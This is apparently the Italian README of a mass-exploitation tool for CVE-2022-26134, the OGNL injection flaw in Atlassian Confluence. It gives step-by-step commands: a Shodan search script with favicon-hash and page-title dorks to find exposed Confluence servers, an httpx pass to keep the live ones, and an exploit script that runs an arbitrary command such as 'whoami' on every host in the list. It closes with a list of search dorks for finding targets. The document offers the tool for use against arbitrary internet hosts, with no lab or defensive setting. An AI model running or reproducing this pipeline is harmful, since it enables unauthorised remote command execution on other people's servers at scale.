
Scanner di exploit per CVE-2022-26134 in Atlassian Confluence. Utilizza Shodan per trovare host vulnerabili, quindi esegue comandi tramite la vulnerabilità di iniezione OGNL.
Prima esegui gli script shodan per recuperare tutti gli IP
python3 shodan_script.py -API your_api -L limit -D "http.favicon.hash:-305179312 200" > log.txt
ex: python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt
Per tutti gli IP validi :
cat log.txt | httpx -o forexploits.txt
Esegui l'exploit contro la lista "forexploits.txt" :
python3 CVE-2022-26134.py forexploits.txt "whoami"
che stampa l'IP e il comando per gli host vulnerabili.
http.component:"atlassian confluence"
http.favicon.hash:-305179312"
http.title:"Log In - Confluence" 200
http.component:"atlassian confluence" http.title:"Log In - Confluence" 200
http.favicon.hash:-305179312 200